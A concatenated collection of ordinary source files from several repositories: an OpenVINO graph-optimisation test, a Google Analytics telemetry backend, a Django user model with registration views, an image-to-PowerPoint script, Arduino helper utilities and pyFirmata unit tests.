('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
('conv_3_data', 'conv_4'),
('conv_4_w', 'conv_4'),
('conv_4_b', 'conv_4'),
('conv_4', 'conv_4_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3])},
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3])},
'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
'conv_3_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_3': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3])},
'conv_3_data': {'shape': np.array([1, 3, 55, 55])},
'conv_4_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_4': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3])},
'conv_4_data': {'shape': np.array([1, 3, 55, 55])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_4_data', check_op_attrs=True)
self.assertTrue(flag, resp)
```
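Each test above is annotated with the intended rewrite, e.g. `Pl->Conv(1x1,1x1)->Conv(1x1,2x2) => Pl->Conv(1x1,2x2)->Conv(1x1,1x1)`: pulling the stride onto the earlier convolution shrinks the intermediate feature map while leaving the final output shape untouched. A standalone back-of-the-envelope check of that shape argument (exact for the 1x1 kernels these tests use, ignoring padding):
```python
# The final spatial size only depends on the product of the strides,
# so reordering them changes intermediate shapes but not the output.
def out_size(size, strides):
    for s in strides:
        size //= s
    return size

assert out_size(224, [1, 2]) == out_size(224, [2, 1]) == 112  # test_resnet_optimization_1
assert out_size(224, [2, 2]) == out_size(224, [4, 1]) == 56   # test_resnet_optimization_2
```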
#### File: telemetry/backend/backend_ga.py
```python
import uuid
from telemetry.backend.backend import TelemetryBackend
from telemetry.utils.message import Message, MessageType
from telemetry.utils.guid import get_or_generate_uid
class GABackend(TelemetryBackend):
backend_url = 'https://www.google-analytics.com/collect'
id = 'ga'
def __init__(self, tid: str = None, app_name: str = None, app_version: str = None):
super(GABackend, self).__init__(tid, app_name, app_version)
if tid is None:
tid = 'UA-17808594-29'
self.tid = tid
self.uid = get_or_generate_uid('openvino_ga_uid', lambda: str(uuid.uuid4()), is_valid_uuid4)
self.app_name = app_name
self.app_version = app_version
self.default_message_attrs = {
'v': '1', # API Version
'tid': self.tid,
'cid': self.uid,
'an': self.app_name,
'av': self.app_version,
'ua': 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14' # dummy identifier of the browser
}
def send(self, message: Message):
try:
import requests
requests.post(self.backend_url, message.attrs, timeout=1.0)
except Exception:
pass
def build_event_message(self, event_category: str, event_action: str, event_label: str, event_value: int = 1,
**kwargs):
data = self.default_message_attrs.copy()
data.update({
't': 'event',
'ec': event_category,
'ea': event_action,
'el': event_label,
'ev': event_value,
})
return Message(MessageType.EVENT, data)
def build_session_start_message(self, **kwargs):
data = self.default_message_attrs.copy()
data.update({
'sc': 'start',
't': 'event',
'ec': 'session',
'ea': 'control',
'el': 'start',
'ev': 1,
})
return Message(MessageType.SESSION_START, data)
def build_session_end_message(self, **kwargs):
data = self.default_message_attrs.copy()
data.update({
'sc': 'end',
't': 'event',
'ec': 'session',
'ea': 'control',
'el': 'end',
'ev': 1,
})
return Message(MessageType.SESSION_END, data)
def build_error_message(self, error_msg: str, **kwargs):
pass
def build_stack_trace_message(self, error_msg: str, **kwargs):
pass
def is_valid_uuid4(uid: str):
try:
uuid.UUID(uid, version=4)
except ValueError:
return False
return True
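# Hypothetical usage sketch (not part of the original module): build one Measurement
# Protocol event and post it. The app name/version below are made-up placeholders.
if __name__ == '__main__':
    backend = GABackend(app_name='example_app', app_version='0.0.1')
    event = backend.build_event_message('session', 'control', 'start')
    backend.send(event)  # send() swallows network errors, so this is fire-and-forget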
``` |
{
"source": "jochanmin/Blog",
"score": 2
} |
#### File: backend/users/models.py
```python
from django.contrib.auth.models import (
    BaseUserManager, AbstractBaseUser, PermissionsMixin
)
from django.db import models
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
class UserManager(BaseUserManager):
    def create_user(self, email, nickname, password=None):
        """
        Create a User instance with the given personal information (email, nickname, password).
        """
if not email:
raise ValueError(_('Users must have an email address'))
user = self.model(
email=self.normalize_email(email),
nickname=nickname,
)
user.set_password(password)
user.save(using=self._db)
return user
    def create_superuser(self, email, nickname, password):
        """
        Create a User instance with the given personal information (email, nickname, password).
        Since this is the top-level (super) user, also grant the corresponding permissions.
        """
user = self.create_user(
email=email,
password=password,
nickname=nickname,
)
user.is_superuser = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
email = models.EmailField(
verbose_name=_('Email address'),
max_length=255,
unique=True,
)
nickname = models.CharField(
verbose_name=_('Nickname'),
default='Jake',
max_length=30,
unique=True
)
is_active = models.BooleanField(
verbose_name=_('Is active'),
default=True
)
date_joined = models.DateTimeField(
verbose_name=_('Date joined'),
default=timezone.now
)
    # This field may be kept for compatibility with a legacy system.
salt = models.CharField(
verbose_name=_('Salt'),
max_length=10,
blank=True
)
objects = UserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['nickname', ]
class Meta:
verbose_name = _('user')
verbose_name_plural = _('users')
ordering = ('-date_joined',)
def __str__(self):
return self.nickname
def get_full_name(self):
return self.nickname
def get_short_name(self):
return self.nickname
@property
def is_staff(self):
"Is the user a member of staff?"
# Simplest possible answer: All superusers are staff
return self.is_superuser
get_full_name.short_description = _('Full name')
```
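A short usage sketch for the manager and model above. The import path and the credential values are placeholders, and the custom model is assumed to be registered via `AUTH_USER_MODEL` in the project settings:
```python
# Placeholder values; assumes AUTH_USER_MODEL = 'users.User' in settings.py.
from users.models import User

user = User.objects.create_user(
    email="[email protected]",
    nickname="jake",
    password="example-password",
)
admin = User.objects.create_superuser(
    email="[email protected]",
    nickname="admin",
    password="example-password",
)
print(user.get_short_name(), admin.is_staff)  # "jake" True
```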
#### File: backend/users/views.py
```python
from django.shortcuts import render
from django.core import serializers
from .models import User
from django.forms.models import model_to_dict
from rest_framework import status
from rest_framework.response import Response
from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import IsAuthenticated
# Sign-up: /users/auth/
# Account registration endpoint: /users/register
@api_view(['POST'])
def register(request):
data=request.data
if all(i in data for i in ('email','nickname','password')):
email_check=User.objects.filter(email=data['email'])
nick_check=User.objects.filter(nickname=data['nickname'])
if email_check.exists():
return Response({"message": "email already exists"}, status=status.HTTP_409_CONFLICT)
elif nick_check.exists():
return Response({"message": "nickname already exists"}, status=status.HTTP_409_CONFLICT)
else:
user = User.objects.create_user(
data['email'],
data['nickname'],
data['password'],
)
user.save()
return Response(model_to_dict(user), status=status.HTTP_201_CREATED)
else:
return Response({"message": "key error"}, status=status.HTTP_400_BAD_REQUEST)
# Given a token, returns that user's info: /users/users
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def info(request):
user = request.user
data = request.data
try:
searchU=User.objects.filter(email=user.email)
        if searchU.count() == 0:
return Response({"message": "Can't find info"}, status=status.HTTP_404_NOT_FOUND)
data = {
'email': user.email,
'nickname':user.nickname
}
return Response((data), status=status.HTTP_200_OK)
except User.DoesNotExist:
return Response({"message": "info does not exists"}, status=status.HTTP_404_NOT_FOUND)
``` |
{
"source": "jochasinga/file2slide",
"score": 3
} |
#### File: jochasinga/file2slide/file2slide.py
```python
from pptx import Presentation
from pptx.util import Inches
from wand.image import Image
import os, os.path
layoutMode = {
'TITLE' : 0,
'TITLE_AND_CONTENT' : 1,
'SECTION_HEADER' : 2,
'SEQUE' : 2,
'TWO_CONTENT' : 3,
'COMPARISON' : 4,
'TITLE_ONLY' : 5,
'BLANK' : 6,
'CONTENT_WITH_CAPTION' : 7,
'PICTURE_WITH_CAPTION' : 8,
'' : 6
}
# Crop images
def crop_image(path):
print "Entering crop_image()"
subfiles = os.listdir(path)
left = int(raw_input("LEFT CROP: "))
top = int(raw_input("TOP CROP: "))
# TODO: Figure out how to configure right and bottom crop
#right = raw_input(float("RIGHT CROP: ").strip())
#bottom = raw_input(float("BOTTOM CROP: ").strip())
for sf in subfiles:
if os.path.join(path, sf).lower().endswith(('.jpg', '.png', '.jpeg', '.gif', '.tiff',)):
print "cropping %s" % (os.path.join(path, sf))
with Image(filename=os.path.join(path, sf)) as img:
img.crop(left=left, top=top, width=img.width, height=img.height)
img.save(filename=os.path.join(path, sf))
def pdf2image(path, *pages):
# converting first page into JPG
if pages:
for page in pages:
newpath = path + ('[%s]' % page)
with Image(filename=newpath) as img:
imagepath = os.path.splitext(path)[0] + '.jpg'
img.save(filename=imagepath)
# TODO: Refactor so that yielding is done only in filter_files()
yield imagepath
# Filter files and images
def filter_files(path):
files = os.listdir(path)
for f in files:
root = os.path.join(path, f)
if os.path.isdir(root):
print "Expecting FILE, got DIR!"
if os.path.basename(root) == 'crop':
print "Found a subdirectory named 'crop'"
print """
######################## CROP IMAGES #######################\r
+ Set CROPPING for all images inside 'crop' directory.\r
+ The values are LEFT, TOP, RIGHT, and BOTTOM.\r
+ OR /images for relative path.\r
############################################################\n
"""
crop_image(root)
subfiles = os.listdir(root)
for sf in subfiles:
if sf.lower().endswith(('.jpg', '.png', '.jpeg', '.gif', '.tiff',)):
yield os.path.join(root, sf)
elif os.path.isfile(root):
if root.lower().endswith(('.jpg', '.png', '.jpeg', '.gif', '.tiff',)):
yield root
            elif root.lower().endswith('.pdf'):
                # pdf2image() is a generator, so iterate over it; otherwise the PDF is silently skipped.
                for imagepath in pdf2image(root, 0):
                    yield imagepath
print """
#################### LOCATE DIRECTORY #######################\r
+ Locate the directory where your images are located.\r
+ For example: User/Macbook/Pictures for absolute path,\r
+ OR /images for relative path.\r
+ Make sure no subdirectories are present in the directory.\r
+ Optionally, you can drag the directory into the terminal\r
+ window after the prompt.\r
#############################################################\n
"""
img_path = raw_input("Where is the images folder?: ").strip()
# Create a presentation file
print "Creating presentation..."
prs = Presentation()
print """
##################### CHOOSE LAYOUT STYLE ######################\r
+ Powerpoint comes with several layout styles for slides.\r
+ For example: TITLE, TITLE_WITH_CONTENT, BLANK, etc.\r
+ Type the preferred style in UPPERCASE into the next prompt\r
+ OR hit RETURN for default BLANK style.\r
"""
for mode in (k for k in layoutMode if k != ''):
print mode
print """
################################################################\r
"""
layout_mode = raw_input("\nWhat's your slides layout style?: ").strip()
slide_layout = prs.slide_layouts[layoutMode[layout_mode]]
print"""
######################## SET MARGINS ###########################\r
+ Set LEFT, TOP, and RIGHT margins of your images.\r
+ Note that if RIGHT margin is set, images will be scaled\r
+ proportionally to fit. Otherwise, hit RETURN when\r
+ prompted to set margin to 0 (fit to the slide).\r
+ Margins are in inches.\r
#################################################################\n
"""
left = Inches(float( raw_input("LEFT MARGIN: ") or 0 ))
top = Inches(float( raw_input("TOP MARGIN: ") or 0 ))
width = prs.slide_width - (left + Inches(float(raw_input("RIGHT MARGIN: ") or 0)))
for path in filter_files(img_path):
print "Creating slide..."
slide = prs.slides.add_slide(slide_layout)
print "Adding " + path
pic = slide.shapes.add_picture(path, left, top, width)
print"""
##################### SAVE TO DIRECTORY ########################\r
+ CONGRATS! I finished adding images to slides alright.\r
+ Now tell me where to save your powerpoint file.\r
+ If you provide me with just a name i.e. 'test.pptx',\r
+ I will save the file to your images directory. Otherwise,\r
+ give a path like 'User/Macbook/Documents/test.pptx'\r
+ or drag the directory into this window as usual.\r
#################################################################\n
"""
save_to = raw_input("Where to save your powerpoint to?: ").strip()
# save_to = 'test.pptx'
if save_to.rpartition('/')[0] == '' and save_to.rpartition('/')[1] == '':
if not save_to.lower().endswith('.pptx'):
prs.save(os.path.join(img_path, save_to + '.pptx'))
print "Your file is saved to -> " + os.path.join(img_path, save_to + '.pptx')
else:
prs.save(os.path.join(img_path, save_to))
print "Your file is saved to -> " + os.path.join(img_path, save_to)
elif save_to.rpartition('/')[0] != '' and save_to.lower().endswith('.pptx'):
    # '/' found, looks like an absolute path
prs.save(save_to)
print "Your file is saved to -> " + save_to
elif save_to.rpartition('/')[0] != '' and not save_to.endswith('.pptx'):
print "Look like you have a path, but still missing the file name..."
name = raw_input("Please type your preferred file name: ")
name = name if name.endswith('.pptx') else (name + '.pptx')
prs.save(os.path.join(save_to, name))
print "Your file is saved to -> " + os.path.join(save_to, name)
else:
print "There's something fishy with the file name and directory. Would you mind starting over?"
``` |
{
"source": "jochasinga/pluto",
"score": 4
} |
#### File: pluto/examples/blink.py
```python
import sys, os
sys.path.append('../pluto')
from pluto import *
import time
def main():
# Invoke a general board
board = Board()
board.led(13).blink()
if __name__ == '__main__':
main()
```
#### File: pluto/examples/led.py
```python
import sys, os
sys.path.append('../pluto')
from pluto import *
import time
def main():
# Invoke a general board
board = Board()
board.led(13).on()
time.sleep(1)
# the board remembers the on-board led
board.led.off()
if __name__ == '__main__':
main()
```
#### File: pluto/pluto/utils.py
```python
from builtins import object
import pluto
import re
import serial.tools.list_ports
import time
from pyfirmata import util, OUTPUT, INPUT, PWM
from pluto import LOW, HIGH, LED_BUILTIN
import exceptions
class ArduinoUtil(object):
"""
A utility class containing all the Arduino-esque functions
"""
@staticmethod
def digitalWrite(board, pin_number, value):
if isinstance(board, pluto.Board):
if board.digital[pin_number].mode != OUTPUT:
board.digital[pin_number].mode = OUTPUT
else:
pass
board.digital[pin_number].write(value)
else:
raise TypeError("The object isn't an instance of 'pluto.Board'")
@staticmethod
def digitalRead(board, pin_number):
if isinstance(board, pluto.Board):
if board.digital[pin_number].mode != INPUT:
board.digital[pin_number].mode = INPUT
else:
pass
board.digital[pin_number].read()
else:
raise TypeError("The object isn't an instance of 'pluto.Board'.")
@staticmethod
def analogWrite(board, pin_number, value):
if isinstance(board, pluto.Board):
if board.digital[pin_number].PWM_CAPABLE:
                if board.digital[pin_number].mode != PWM:
board.digital[pin_number]._set_mode(PWM)
else:
pass
board.digital[pin_number].write(value)
else:
raise exceptions.PinError("This pin is not PWM capable.")
else:
raise TypeError("The object isn't an instance of 'pluto.Board'.")
@staticmethod
def analogRead(board, pin_number):
if isinstance(board, pluto.Board):
board.analog[pin_number].read()
else:
raise TypeError("The object isn't an instance of 'pluto.Board'.")
class PortUtil(object):
"""Helper class that scan serial port automatically"""
comports = [p[0] for p in serial.tools.list_ports.comports()]
num_ports = len(comports)
auto_port = None
keywords = []
patterns = []
@classmethod
def count_ports(cls):
return cls.num_ports
@classmethod
def scan(cls, *args, **kwargs):
if len(args) == 0:
cls.keywords = ['usb', 'serial']
else:
for index, val in enumerate(args):
cls.keywords.append(val)
for keyword in cls.keywords:
p = re.compile('(/dev/)((tty)|(cu)|.*).({0})\w*[\d]'.format(keyword))
cls.patterns.append(p)
for port in cls.comports:
for pattern in cls.patterns:
m = pattern.match(port)
if m:
cls.auto_port = m.group()
else:
pass
return cls.auto_port
``` |
{
"source": "jochasinga/pyFirmata",
"score": 3
} |
#### File: jochasinga/pyFirmata/tests.py
```python
from __future__ import division, unicode_literals
import unittest
from itertools import chain
import serial
import pyfirmata
from pyfirmata import mockup
from pyfirmata.boards import BOARDS
from pyfirmata.util import (break_to_bytes, from_two_bytes,
str_to_two_byte_iter, to_two_bytes,
two_byte_iter_to_str)
# Messages todo left:
# type command channel first byte second byte
# ---------------------------------------------------------------------------
# set pin mode(I/O) 0xF4 pin # (0-127) pin state(0=in)
# system reset 0xFF
class BoardBaseTest(unittest.TestCase):
def setUp(self):
# Test with the MockupSerial so no real connection is needed
pyfirmata.pyfirmata.serial.Serial = mockup.MockupSerial
        # Set the wait time to zero so we won't have to wait a couple of seconds
        # for each test.
pyfirmata.pyfirmata.BOARD_SETUP_WAIT_TIME = 0
self.board = pyfirmata.Board('', BOARDS['arduino'])
self.board._stored_data = []
# FIXME How can it be that a fresh instance sometimes still contains data?
class TestBoardMessages(BoardBaseTest):
# TODO Test layout of Board Mega
def assert_serial(self, *incoming_bytes):
serial_msg = bytearray()
res = self.board.sp.read()
while res:
serial_msg += res
res = self.board.sp.read()
self.assertEqual(bytearray(incoming_bytes), serial_msg)
# First test the handlers
def test_handle_analog_message(self):
self.board.analog[3].reporting = True
self.assertEqual(self.board.analog[3].read(), None)
        # This should set it correctly. 1023 (sent as 127, 7 in two 7-bit bytes) is the
        # max value an analog pin will send, and it should result in a value of 1.0.
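        # Worked example of the two-7-bit-byte encoding (plain arithmetic, not a library call):
        # 1023 -> LSB = 1023 % 128 = 127, MSB = 1023 >> 7 = 7, and the handler rebuilds
        # 127 + (7 << 7) = 1023, which is normalised to 1023 / 1023 = 1.0.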
self.board._handle_analog_message(3, 127, 7)
self.assertEqual(self.board.analog[3].read(), 1.0)
def test_handle_digital_message(self):
# A digital message sets the value for a whole port. We will set pin
# 5 (That is on port 0) to 1 to test if this is working.
self.board.digital_ports[0].reporting = True
self.board.digital[5]._mode = 0 # Set it to input
# Create the mask
mask = 0
        mask |= 1 << 5  # set the bit for pin 5 to 1
self.assertEqual(self.board.digital[5].read(), None)
self.board._handle_digital_message(0, mask % 128, mask >> 7)
self.assertEqual(self.board.digital[5].read(), True)
def test_handle_report_version(self):
self.assertEqual(self.board.firmata_version, None)
self.board._handle_report_version(2, 1)
self.assertEqual(self.board.firmata_version, (2, 1))
def test_handle_report_firmware(self):
self.assertEqual(self.board.firmware, None)
data = bytearray([2, 1])
data.extend(str_to_two_byte_iter('Firmware_name'))
self.board._handle_report_firmware(*data)
self.assertEqual(self.board.firmware, 'Firmware_name')
self.assertEqual(self.board.firmware_version, (2, 1))
# type command channel first byte second byte
# ---------------------------------------------------------------------------
# analog I/O message 0xE0 pin # LSB(bits 0-6) MSB(bits 7-13)
def test_incoming_analog_message(self):
self.assertEqual(self.board.analog[4].read(), None)
self.assertEqual(self.board.analog[4].reporting, False)
# Should do nothing as the pin isn't set to report
self.board.sp.write([pyfirmata.ANALOG_MESSAGE + 4, 127, 7])
self.board.iterate()
self.assertEqual(self.board.analog[4].read(), None)
self.board.analog[4].enable_reporting()
self.board.sp.clear()
# This should set analog port 4 to 1
self.board.sp.write([pyfirmata.ANALOG_MESSAGE + 4, 127, 7])
self.board.iterate()
self.assertEqual(self.board.analog[4].read(), 1.0)
self.board._stored_data = []
def test_handle_capability_response(self):
"""
Capability Response codes:
# INPUT: 0, 1
# OUTPUT: 1, 1
# ANALOG: 2, 10
# PWM: 3, 8
        # SERVO: 4, 14
# I2C: 6, 1
Arduino's Example: (ATMega328P-PU)
(127,
127,
0, 1, 1, 1, 4, 14, 127,
0, 1, 1, 1, 3, 8, 4, 14, 127,
0, 1, 1, 1, 4, 14, 127,
0, 1, 1, 1, 3, 8, 4, 14, 127,
0, 1, 1, 1, 3, 8, 4, 14, 127,
0, 1, 1, 1, 4, 14, 127,
0, 1, 1, 1, 4, 14, 127,
0, 1, 1, 1, 3, 8, 4, 14, 127,
0, 1, 1, 1, 3, 8, 4, 14, 127,
0, 1, 1, 1, 3, 8, 4, 14, 127,
0, 1, 1, 1, 4, 14, 127,
0, 1, 1, 1, 4, 14, 127,
0, 1, 1, 1, 2, 10, 127,
0, 1, 1, 1, 2, 10, 127,
0, 1, 1, 1, 2, 10, 127,
0, 1, 1, 1, 2, 10, 127,
0, 1, 1, 1, 2, 10, 6, 1, 127,
0, 1, 1, 1, 2, 10, 6, 1, 127)
"""
test_layout = {
'digital': (0, 1, 2),
'analog': (0, 1),
'pwm': (1, 2),
'servo': (0, 1, 2),
# 'i2c': (2), # TODO 2.3 specs
'disabled': (0,),
}
# Eg: (127)
unavailible_pin = [
0x7F, # END_SYSEX (Pin delimiter)
]
# Eg: (0, 1, 1, 1, 3, 8, 4, 14, 127)
digital_pin = [
0x00, # INPUT
0x01,
0x01, # OUTPUT
0x01,
0x03, # PWM
0x08,
0x7F, # END_SYSEX (Pin delimiter)
]
# Eg. (0, 1, 1, 1, 4, 14, 127)
analog_pin = [
0x00, # INPUT
0x01,
0x01, # OUTPUT
0x01,
0x02, # ANALOG
0x0A,
0x06, # I2C
0x01,
0x7F, # END_SYSEX (Pin delimiter)
]
data_arduino = list(
[0x6C] # CAPABILITY_RESPONSE
+ unavailible_pin
+ digital_pin * 2
+ analog_pin * 2
)
self.board._handle_report_capability_response(*data_arduino)
for key in test_layout.keys():
self.assertEqual(self.board._layout[key], test_layout[key])
# type command channel first byte second byte
# ---------------------------------------------------------------------------
# digital I/O message 0x90 port LSB(bits 0-6) MSB(bits 7-13)
def test_incoming_digital_message(self):
# A digital message sets the value for a whole port. We will set pin
# 9 (on port 1) to 1 to test if this is working.
self.board.digital[9].mode = pyfirmata.INPUT
self.board.sp.clear() # clear mode sent over the wire.
# Create the mask
mask = 0
        mask |= 1 << (9 - 8)  # set the bit for pin 9 to 1
self.assertEqual(self.board.digital[9].read(), None)
self.board.sp.write([pyfirmata.DIGITAL_MESSAGE + 1, mask % 128, mask >> 7])
self.board.iterate()
self.assertEqual(self.board.digital[9].read(), True)
# version report format
# -------------------------------------------------
# 0 version report header (0xF9) (MIDI Undefined)
# 1 major version (0-127)
# 2 minor version (0-127)
def test_incoming_report_version(self):
self.assertEqual(self.board.firmata_version, None)
self.board.sp.write([pyfirmata.REPORT_VERSION, 2, 1])
self.board.iterate()
self.assertEqual(self.board.firmata_version, (2, 1))
# Receive Firmware Name and Version (after query)
# 0 START_SYSEX (0xF0)
# 1 queryFirmware (0x79)
# 2 major version (0-127)
# 3 minor version (0-127)
# 4 first 7-bits of firmware name
# 5 second 7-bits of firmware name
# x ...for as many bytes as it needs)
# 6 END_SYSEX (0xF7)
def test_incoming_report_firmware(self):
self.assertEqual(self.board.firmware, None)
self.assertEqual(self.board.firmware_version, None)
msg = [pyfirmata.START_SYSEX,
pyfirmata.REPORT_FIRMWARE,
2,
1] + list(str_to_two_byte_iter('Firmware_name')) + \
[pyfirmata.END_SYSEX]
self.board.sp.write(msg)
self.board.iterate()
self.assertEqual(self.board.firmware, 'Firmware_name')
self.assertEqual(self.board.firmware_version, (2, 1))
# type command channel first byte second byte
# ---------------------------------------------------------------------------
# report analog pin 0xC0 pin # disable/enable(0/1) - n/a -
def test_report_analog(self):
self.board.analog[1].enable_reporting()
self.assert_serial(0xC0 + 1, 1)
self.assertTrue(self.board.analog[1].reporting)
self.board.analog[1].disable_reporting()
self.assert_serial(0xC0 + 1, 0)
self.assertFalse(self.board.analog[1].reporting)
# type command channel first byte second byte
# ---------------------------------------------------------------------------
# report digital port 0xD0 port disable/enable(0/1) - n/a -
def test_report_digital(self):
# This should enable reporting of whole port 1
self.board.digital[8]._mode = pyfirmata.INPUT # Outputs can't report
self.board.digital[8].enable_reporting()
self.assert_serial(0xD0 + 1, 1)
self.assertTrue(self.board.digital_ports[1].reporting)
self.board.digital[8].disable_reporting()
self.assert_serial(0xD0 + 1, 0)
# Generic Sysex Message
# 0 START_SYSEX (0xF0)
# 1 sysex command (0x00-0x7F)
# x between 0 and MAX_DATA_BYTES 7-bit bytes of arbitrary data
# last END_SYSEX (0xF7)
def test_send_sysex_message(self):
# 0x79 is queryFirmware, but that doesn't matter for now
self.board.send_sysex(0x79, [1, 2, 3])
sysex = (0xF0, 0x79, 1, 2, 3, 0xF7)
self.assert_serial(*sysex)
def test_send_sysex_string(self):
self.board.send_sysex(0x79, bytearray("test", 'ascii'))
sysex = [0xF0, 0x79]
sysex.extend(bytearray('test', 'ascii'))
sysex.append(0xF7)
self.assert_serial(*sysex)
def test_send_sysex_too_big_data(self):
self.assertRaises(ValueError, self.board.send_sysex, 0x79, [256, 1])
def test_receive_sysex_message(self):
sysex = bytearray([0xF0, 0x79, 2, 1, ord('a'), 0, ord('b'),
0, ord('c'), 0, 0xF7])
self.board.sp.write(sysex)
while len(self.board.sp):
self.board.iterate()
self.assertEqual(self.board.firmware_version, (2, 1))
self.assertEqual(self.board.firmware, 'abc')
def test_too_much_data(self):
"""
When we send random bytes, before or after a command, they should be
ignored to prevent cascading errors when missing a byte.
"""
self.board.analog[4].enable_reporting()
self.board.sp.clear()
# Crap
self.board.sp.write([i for i in range(10)])
# This should set analog port 4 to 1
self.board.sp.write([pyfirmata.ANALOG_MESSAGE + 4, 127, 7])
# Crap
self.board.sp.write([10 - i for i in range(10)])
while len(self.board.sp):
self.board.iterate()
self.assertEqual(self.board.analog[4].read(), 1.0)
# Servo config
# --------------------
# 0 START_SYSEX (0xF0)
# 1 SERVO_CONFIG (0x70)
# 2 pin number (0-127)
# 3 minPulse LSB (0-6)
# 4 minPulse MSB (7-13)
# 5 maxPulse LSB (0-6)
# 6 maxPulse MSB (7-13)
# 7 END_SYSEX (0xF7)
#
# then sets angle
# 8 analog I/O message (0xE0)
# 9 angle LSB
# 10 angle MSB
def test_servo_config(self):
self.board.servo_config(2)
data = chain([0xF0, 0x70, 2], to_two_bytes(544),
to_two_bytes(2400), [0xF7, 0xE0 + 2, 0, 0])
self.assert_serial(*list(data))
def test_servo_config_min_max_pulse(self):
self.board.servo_config(2, 600, 2000)
data = chain([0xF0, 0x70, 2], to_two_bytes(600),
to_two_bytes(2000), [0xF7, 0xE0 + 2, 0, 0])
self.assert_serial(*data)
def test_servo_config_min_max_pulse_angle(self):
self.board.servo_config(2, 600, 2000, angle=90)
data = chain([0xF0, 0x70, 2], to_two_bytes(600),
to_two_bytes(2000), [0xF7])
angle_set = [0xE0 + 2, 90 % 128,
90 >> 7] # Angle set happens through analog message
data = list(data) + angle_set
self.assert_serial(*data)
def test_servo_config_invalid_pin(self):
self.assertRaises(IOError, self.board.servo_config, 1)
def test_set_mode_servo(self):
p = self.board.digital[2]
p.mode = pyfirmata.SERVO
data = chain([0xF0, 0x70, 2], to_two_bytes(544),
to_two_bytes(2400), [0xF7, 0xE0 + 2, 0, 0])
self.assert_serial(*data)
class TestBoardLayout(BoardBaseTest):
def test_layout_arduino(self):
self.assertEqual(len(BOARDS['arduino']['digital']), len(self.board.digital))
self.assertEqual(len(BOARDS['arduino']['analog']), len(self.board.analog))
def test_layout_arduino_mega(self):
pyfirmata.pyfirmata.serial.Serial = mockup.MockupSerial
mega = pyfirmata.Board('', BOARDS['arduino_mega'])
self.assertEqual(len(BOARDS['arduino_mega']['digital']), len(mega.digital))
self.assertEqual(len(BOARDS['arduino_mega']['analog']), len(mega.analog))
def test_pwm_layout(self):
pins = []
for pin in self.board.digital:
if pin.PWM_CAPABLE:
pins.append(self.board.get_pin('d:%d:p' % pin.pin_number))
for pin in pins:
self.assertEqual(pin.mode, pyfirmata.PWM)
self.assertTrue(pin.pin_number in BOARDS['arduino']['pwm'])
self.assertTrue(len(pins) == len(BOARDS['arduino']['pwm']))
def test_get_pin_digital(self):
pin = self.board.get_pin('d:13:o')
self.assertEqual(pin.pin_number, 13)
self.assertEqual(pin.mode, pyfirmata.OUTPUT)
self.assertEqual(pin.port.port_number, 1)
self.assertEqual(pin.port.reporting, False)
def test_get_pin_analog(self):
pin = self.board.get_pin('a:5:i')
self.assertEqual(pin.pin_number, 5)
self.assertEqual(pin.reporting, True)
self.assertEqual(pin.value, None)
def tearDown(self):
self.board.exit()
pyfirmata.serial.Serial = serial.Serial
class TestMockupSerial(unittest.TestCase):
def setUp(self):
self.s = mockup.MockupSerial('someport', 4800)
def test_only_bytes(self):
self.s.write(0xA0)
self.s.write(100)
self.assertRaises(TypeError, self.s.write, 'blaat')
def test_write_read(self):
self.s.write(0xA1)
self.s.write([1, 3, 5])
self.assertEqual(self.s.read(2), bytearray([0xA1, 0x01]))
self.assertEqual(len(self.s), 2)
self.assertEqual(self.s.read(), bytearray([3]))
self.assertEqual(self.s.read(), bytearray([5]))
self.assertEqual(len(self.s), 0)
self.assertEqual(self.s.read(), bytearray())
self.assertEqual(self.s.read(2), bytearray())
def test_none(self):
self.assertEqual(self.s.read(), bytearray())
class TestMockupBoardLayout(TestBoardLayout, TestBoardMessages):
"""
TestMockupBoardLayout is subclassed from TestBoardLayout and
TestBoardMessages as it should pass the same tests, but with the
MockupBoard.
"""
def setUp(self):
self.board = mockup.MockupBoard('test', BOARDS['arduino'])
class RegressionTests(BoardBaseTest):
def test_correct_digital_input_first_pin_issue_9(self):
"""
The first pin on the port would always be low, even if the mask said
it to be high.
"""
pin = self.board.get_pin('d:8:i')
mask = 0
mask |= 1 << 0 # set pin 0 high
self.board._handle_digital_message(pin.port.port_number,
mask % 128, mask >> 7)
self.assertEqual(pin.value, True)
def test_handle_digital_inputs(self):
"""
Test if digital inputs are correctly updated.
"""
for i in range(8, 16): # pins of port 1
if not bool(i % 2) and i != 14: # all even pins
self.board.digital[i].mode = pyfirmata.INPUT
self.assertEqual(self.board.digital[i].value, None)
mask = 0
# Set the mask high for the first 4 pins
for i in range(4):
mask |= 1 << i
self.board._handle_digital_message(1, mask % 128, mask >> 7)
self.assertEqual(self.board.digital[8].value, True)
self.assertEqual(self.board.digital[9].value, None)
self.assertEqual(self.board.digital[10].value, True)
self.assertEqual(self.board.digital[11].value, None)
self.assertEqual(self.board.digital[12].value, False)
self.assertEqual(self.board.digital[13].value, None)
def test_proper_exit_conditions(self):
"""
Test that the exit method works properly if we didn't make it all
the way through `setup_layout`.
"""
del self.board.digital
try:
self.board.exit()
except AttributeError:
self.fail("exit() raised an AttributeError unexpectedly!")
